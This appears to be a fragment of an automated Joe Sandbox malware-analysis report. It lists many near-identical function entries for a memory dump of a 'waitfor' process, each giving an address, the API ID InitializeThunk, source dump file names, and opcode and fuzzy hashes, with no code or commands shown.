                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 2d9fda8659638fa86f5f3e159ec6362f44468c6b42a6872deaca7cc01de83a27
                                                                                                                • Instruction ID: 09b50227317fcc0b00ceb69003c66df74e199cd130a21333526ad171af365a19
                                                                                                                • Opcode Fuzzy Hash: 2d9fda8659638fa86f5f3e159ec6362f44468c6b42a6872deaca7cc01de83a27
                                                                                                                • Instruction Fuzzy Hash: 889002616015004261507159480441660059BE5305396C225A0555670C8618D955A26A
                                                                                                                Function 047D4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: da42be68d034ea420faefee97cd5dd9855ec77711ab55841d5ccdd0a3d8d6661
                                                                                                                • Instruction ID: 3a088205638b0d737d516f981772ec1ee5442226376222bcfb3841d772319372
                                                                                                                • Opcode Fuzzy Hash: da42be68d034ea420faefee97cd5dd9855ec77711ab55841d5ccdd0a3d8d6661
                                                                                                                • Instruction Fuzzy Hash: BD90023160580012B1507159488455640059BE4305B56C121E0425674C8A14DA566362
                                                                                                                Function 047D2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: f0c868c9885f421ba80371cd8e1dd79cf84d55e83d42718f4373077bce5c3261
                                                                                                                • Instruction ID: e954dc9a62869d5acce5c8a5faf8ca377f8c6780586c1450130cb14759bf2726
                                                                                                                • Opcode Fuzzy Hash: f0c868c9885f421ba80371cd8e1dd79cf84d55e83d42718f4373077bce5c3261
                                                                                                                • Instruction Fuzzy Hash: 8F90023120148802F1207159840475A00058BD4305F5AC521A4425778D8695D9917122
                                                                                                                Function 047D2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 8b16177a39297ae100fa9b9b279cf01eec899386c367d981b57944a2c1df9e1d
                                                                                                                • Instruction ID: 2ebf845620946ae95afda4dce2bef4df7a94836508425cd97327b55d42969960
                                                                                                                • Opcode Fuzzy Hash: 8b16177a39297ae100fa9b9b279cf01eec899386c367d981b57944a2c1df9e1d
                                                                                                                • Instruction Fuzzy Hash: 9A90023120140842F11071594404B5600058BE4305F56C126A0125774D8615D9517522
                                                                                                                Function 047D2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: a14cc5b32d1a043e0adc9ddf32ffda316cfd6bde1558dce7ba88fd17103c12a8
                                                                                                                • Instruction ID: c99258c2b026cc0c6a7741ab432a7e37724669227056482998b67190fc2d6e4c
                                                                                                                • Opcode Fuzzy Hash: a14cc5b32d1a043e0adc9ddf32ffda316cfd6bde1558dce7ba88fd17103c12a8
                                                                                                                • Instruction Fuzzy Hash: FA90023120140402F1107599540865600058BE4305F56D121A5025675EC665D9917132
                                                                                                                Function 047D2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: a52687d8a4663bbd0ec581a9ee1f9fc2d1f0231e8f0d1ede4575063f964de409
                                                                                                                • Instruction ID: c286157c7f259d502d8100b6c2497a4f589f700f61c028ffcff190424eccb69d
                                                                                                                • Opcode Fuzzy Hash: a52687d8a4663bbd0ec581a9ee1f9fc2d1f0231e8f0d1ede4575063f964de409
                                                                                                                • Instruction Fuzzy Hash: 7390022130140003F150715954186164005DBE5305F56D121E0415674CD915D9566223
                                                                                                                Function 047D2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 2ca06d3aba3866d15848b227d54923381706efcde62c52458d64cd7d4c335bca
                                                                                                                • Instruction ID: f6a588346f9271fb85ac93d01977c8c40445da2f371cdcd472252316c4e51bd4
                                                                                                                • Opcode Fuzzy Hash: 2ca06d3aba3866d15848b227d54923381706efcde62c52458d64cd7d4c335bca
                                                                                                                • Instruction Fuzzy Hash: 9390022921340002F1907159540861A00058BD5206F96D525A0016678CC915D9696322
                                                                                                                Function 047D2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 3f18a5fc876d805ac95180a9ac39be8919cde8a749ca0ec74c916ebcbabcf353
                                                                                                                • Instruction ID: cf788a138988e4b519366ce642e34164e6be60bbb069a560b1830b2ac4a2e370
                                                                                                                • Opcode Fuzzy Hash: 3f18a5fc876d805ac95180a9ac39be8919cde8a749ca0ec74c916ebcbabcf353
                                                                                                                • Instruction Fuzzy Hash: 2890023120140413F1217159450471700098BD4245F96C522A0425678D9656DA52B122
                                                                                                                Function 047D2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 4e60d6652c07eee727dcf9ffc7350c0061a6a1f2429eb0bf31585ee5bfa0fcf8
                                                                                                                • Instruction ID: c4f9a9e9bc8cda713ea5bef28835e30bff6817fa7b444b5dc11189daab241e7a
                                                                                                                • Opcode Fuzzy Hash: 4e60d6652c07eee727dcf9ffc7350c0061a6a1f2429eb0bf31585ee5bfa0fcf8
                                                                                                                • Instruction Fuzzy Hash: 55900221242441527555B159440451740069BE4245796C122A1415A70C8526E956E622
                                                                                                                Function 047D2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 423ffc7b76d03914084726d6ddfe4ed68fe35a5debaf878e9ddab3847e834aa0
                                                                                                                • Instruction ID: 432fa674191338cc366870597c62bda3df091ec8a6c2706863de63039936c829
                                                                                                                • Opcode Fuzzy Hash: 423ffc7b76d03914084726d6ddfe4ed68fe35a5debaf878e9ddab3847e834aa0
                                                                                                                • Instruction Fuzzy Hash: 3690026120180403F1507559480461700058BD4306F56C121A2065675E8A29DD517136
                                                                                                                Function 047D2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: f94915525b3cd111942b0b3c2bd9b957a0a0e4d578684f603a3218117588ffec
                                                                                                                • Instruction ID: bbfce90d39726ab3e231d49c1058be8873f2955c135eb3379b7b6ba3e1cf0789
                                                                                                                • Opcode Fuzzy Hash: f94915525b3cd111942b0b3c2bd9b957a0a0e4d578684f603a3218117588ffec
                                                                                                                • Instruction Fuzzy Hash: 9F90022160140502F11171594404626000A8BD4245F96C132A1025675ECA25DA92B132
                                                                                                                Function 047D2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 54cc8d3cc27ed6ee498f59959bc4c6d748f36ebc8e3da0eb92e9e711eb1693cc
                                                                                                                • Instruction ID: 8a0c87c75761a7ae36abc10059158c9c49aa6bde81d60bc92a643ae53a2491ae
                                                                                                                • Opcode Fuzzy Hash: 54cc8d3cc27ed6ee498f59959bc4c6d748f36ebc8e3da0eb92e9e711eb1693cc
                                                                                                                • Instruction Fuzzy Hash: 5E90026134140442F11071594414B160005CBE5305F56C125E1065674D8619DD527127
                                                                                                                Function 047D2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 09dfa46f8f1a8aed04173be7b9e5d1d434fcc6899977071b0a0aab8fddd425b8
                                                                                                                • Instruction ID: e24d4509c6d78deee3a843ca1bdcb78497efed686a9557c552386409164fef25
                                                                                                                • Opcode Fuzzy Hash: 09dfa46f8f1a8aed04173be7b9e5d1d434fcc6899977071b0a0aab8fddd425b8
                                                                                                                • Instruction Fuzzy Hash: 34900221211C0042F21075694C14B1700058BD4307F56C225A0155674CC915D9616522
                                                                                                                Function 047D2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 05ce7322b587c83fbc8b610e7648b8cec6317f4e8841b0477078f0e6be9841d6
                                                                                                                • Instruction ID: 923eabafbb8ea3c1d38c466959bfdf1fa47541231404c60837d08dddfa7eb121
                                                                                                                • Opcode Fuzzy Hash: 05ce7322b587c83fbc8b610e7648b8cec6317f4e8841b0477078f0e6be9841d6
                                                                                                                • Instruction Fuzzy Hash: E0900221601400426150716988449164005AFE5215756C231A0999670D8559D9656666
                                                                                                                Function 047D2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 4c9364b81c200df62fe5e3ffb363a1365ee8b7bad87661bba00a32ffc1f7abc9
                                                                                                                • Instruction ID: 4fb0b8e2b17bc898ec493d8bfad1a16aaee50c1a4172d484c326bd67c3373b2d
                                                                                                                • Opcode Fuzzy Hash: 4c9364b81c200df62fe5e3ffb363a1365ee8b7bad87661bba00a32ffc1f7abc9
                                                                                                                • Instruction Fuzzy Hash: 84900225221400022155B559060451B04459BDA355396C125F14176B0CC621D9656322
                                                                                                                Function 047D2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 76f6eaf74fa7136c0549d50ecdbff6248671eb535ecd00413969d1f55da9224f
                                                                                                                • Instruction ID: 1261eb02577ab0633d2fa8567f1c2c4390e6b65ab731f0e44b1ba60622b784aa
                                                                                                                • Opcode Fuzzy Hash: 76f6eaf74fa7136c0549d50ecdbff6248671eb535ecd00413969d1f55da9224f
                                                                                                                • Instruction Fuzzy Hash: E4900225211400032115B559070451700468BD9355356C131F1016670CD621D9616122
                                                                                                                Function 047D2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 7812482f5c285fae48c8c59c24bf04a812ebe187b7da55205768176bebd98e3f
                                                                                                                • Instruction ID: 7ad64ad574930a4fbcf3af8c3b4868c2c56b3d067bdda7f8c8bcb15689b3f2f4
                                                                                                                • Opcode Fuzzy Hash: 7812482f5c285fae48c8c59c24bf04a812ebe187b7da55205768176bebd98e3f
                                                                                                                • Instruction Fuzzy Hash: C790026120240003611571594414626400A8BE4205B56C131E10156B0DC525D9917126
                                                                                                                Function 047D2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 4ee384e99be60c09759214931ba138cd9b00f4c816c86bf2c59d7d858d793423
                                                                                                                • Instruction ID: 40a357caa876bce63e6d5abd034ff4d334ae43aca5432d5f7b8d7c6c32fb30e5
                                                                                                                • Opcode Fuzzy Hash: 4ee384e99be60c09759214931ba138cd9b00f4c816c86bf2c59d7d858d793423
                                                                                                                • Instruction Fuzzy Hash: 5090023120140802F1907159440465A00058BD5305F96C125A0026774DCA15DB5977A2
                                                                                                                Function 047D2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 8747900994e28914479f0178ba732e244510b769c4f57594e5fe203a0b67583c
                                                                                                                • Instruction ID: 14939f167b7b97de3cf98cb3449565c9c7e56ea35f78308868d7f592f689b348
                                                                                                                • Opcode Fuzzy Hash: 8747900994e28914479f0178ba732e244510b769c4f57594e5fe203a0b67583c
                                                                                                                • Instruction Fuzzy Hash: C390023120544842F15071594404A5600158BD4309F56C121A00657B4D9625DE55B662
                                                                                                                Function 047D2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 78985e401390288d1ce481d139a6d9becde7a4fbd04955e455ba917806fafa1d
                                                                                                                • Instruction ID: ac75f257a34c22d4a6171dbf559f225aacfbfdb71b8b9f178c36cad7fe494f79
                                                                                                                • Opcode Fuzzy Hash: 78985e401390288d1ce481d139a6d9becde7a4fbd04955e455ba917806fafa1d
                                                                                                                • Instruction Fuzzy Hash: B090023160540802F1607159441475600058BD4305F56C121A0025774D8755DB5576A2
                                                                                                                Function 047D35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.3814158265.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.3814158265.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4760000_waitfor.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: d0a7406ee47c05e74e078533f35384bdf639fcccbd35a8d77bb7646d9b57a4d9
                                                                                                                • Instruction ID: ff43bdba3fd9e5af0560bbfcd333e4d786c9f9c0880c4cd5fccf892a08cc290a
                                                                                                                • Opcode Fuzzy Hash: d0a7406ee47c05e74e078533f35384bdf639fcccbd35a8d77bb7646d9b57a4d9
                                                                                                                • Instruction Fuzzy Hash: 2990023160550402F1107159451471610058BD4205F66C521A0425678D8795DA5175A3
                                                                                                                Function 047D39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.3814158265.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
